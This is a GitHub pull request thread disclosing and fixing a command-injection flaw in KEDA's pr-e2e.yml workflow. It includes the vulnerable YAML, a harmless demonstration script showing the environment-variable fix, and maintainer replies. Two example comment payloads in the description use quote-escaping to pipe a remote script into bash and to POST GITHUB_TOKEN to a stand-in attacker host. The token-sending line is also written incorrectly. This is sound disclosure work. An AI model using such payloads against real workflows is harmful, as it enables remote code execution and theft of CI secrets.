Security Update pr-e2e.yml #4822
pr-e2e.yml is vulnerable to RCE via command injection in the comment body. Currently, the following block simply appends the comment body to the shell command. Since the comment body is under the user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead executes arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attacks etc.:

```yaml
- name: Run end to end tests
  continue-on-error: true
  id: test
  env:
    AWS_RUN_IDENTITY_TESTS: true
    AZURE_RUN_AAD_POD_IDENTITY_TESTS: true
    AZURE_RUN_WORKLOAD_IDENTITY_TESTS: true
    GCP_RUN_IDENTITY_TESTS: true
    E2E_IMAGE_TAG: ${{ needs.triage.outputs.image_tag }}
    TEST_CLUSTER_NAME: keda-e2e-cluster-pr
  run: |
    MESSAGE="${{ github.event.comment.body }}"
```

A simple example of a malicious payload in the comment body can be:

```
Security"; curl https://malicious-site.com/malicious-script.sh | bash #
```

This would simply close the double quotes and it would curl a malicious script and pipe it to bash for execution. It will comment out the rest of the command.

Similarly, to exfiltrate environment variables, a sample payload in the comment body can be:

```
Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/
```

This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then, using curl, send the contents of the file in a POST request to the attacker-controlled web server.

Signed-off-by: Aashish Malhotra <74505547+aashish-19@users.noreply.github.com>
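The root cause described above is that `${{ github.event.comment.body }}` is substituted into the `run:` script as plain text before the shell ever parses it, so quote characters in the comment become shell syntax. The mitigation GitHub documents for this class of bug is to expose the value through `env:` (`MESSAGE: ${{ github.event.comment.body }}`) and reference `"$MESSAGE"` in the script, because the shell expands a variable only after it has already decided where the command boundaries are. The script below is an added illustration, not code from the KEDA repository or this PR: it models the runner's textual substitution for the vulnerable step and the environment-variable form for the hardened step, with a constructed comment body that carries a harmless `echo` instead of the `curl | bash` payload quoted above, and it uses `sh -c` in place of the runner's bash (the quoting rules involved are the same).

```shell
#!/bin/sh
# Added example (not part of the KEDA PR): simulates how a GitHub Actions
# runner materializes a `run:` script. `${{ ... }}` is substituted as plain
# text *before* the shell parses the script, so the comment body becomes code.
# The hardened form passes the body through an environment variable instead.

# Constructed comment body: closes the double quotes and appends a harmless
# command, then comments out the remainder of the original line.
SAMPLE_BODY='hello"; echo INJECTED #'

# Vulnerable step: the workflow had `MESSAGE="${{ github.event.comment.body }}"`.
# The runner does a string replace of the expression, then hands the resulting
# text to the shell, which now sees two commands on the first line.
run_vulnerable_step() {
    body="$1"
    # Textual substitution of ${{ github.event.comment.body }} into the script.
    script="MESSAGE=\"${body}\"
echo \"\$MESSAGE\""
    sh -c "$script" 2>/dev/null
}

# Hardened step: the workflow would declare
#   env:
#     MESSAGE: ${{ github.event.comment.body }}
#   run: |
#     MESSAGE="$MESSAGE"
# The script text is fixed; the body arrives as a variable value and is
# expanded after parsing, so it can never terminate or start a command.
run_hardened_step() {
    body="$1"
    script='MESSAGE="$MESSAGE"
echo "$MESSAGE"'
    MESSAGE="$body" sh -c "$script"
}

# Detection helper for the two runs: returns 0 if the injected command ran,
# i.e. a line consisting solely of INJECTED appears in the captured output.
injection_executed() {
    printf '%s\n' "$1" | grep -qx 'INJECTED'
}

# Stand-alone demonstration of both forms on the constructed body.
printf 'vulnerable step output:\n%s\n\n' "$(run_vulnerable_step "$SAMPLE_BODY")"
printf 'hardened step output:\n%s\n' "$(run_hardened_step "$SAMPLE_BODY")"
```

The vulnerable run prints `INJECTED` followed by `hello`, because the substituted text parsed as two statements; the hardened run prints the comment body verbatim, quotes and all, which is the behaviour the fix is meant to guarantee regardless of what a commenter types.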
Thank you for your contribution! 🙏 We will review your PR as soon as possible.
❤️ ❤️ ❤️ ❤️
This has been in my TODO list for a while :(
Luckily that code can't be executed by arbitrary users because previous steps require that the user is part of a specific org team, but fixing the issue is always better than restricting the attack vector.
/skip-e2e
Signed-off-by: Yoon Park <yoongon.park@gmail.com>
Fixes GHSA-w92x-gx4w-j5f2
RCE via command injection in pr-e2e.yml
References
For more information about this vulnerability, please refer to the following resources:
Exploiting GitHub Actions on Open Source Projects
Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects
Vulnerable GitHub Actions Workflows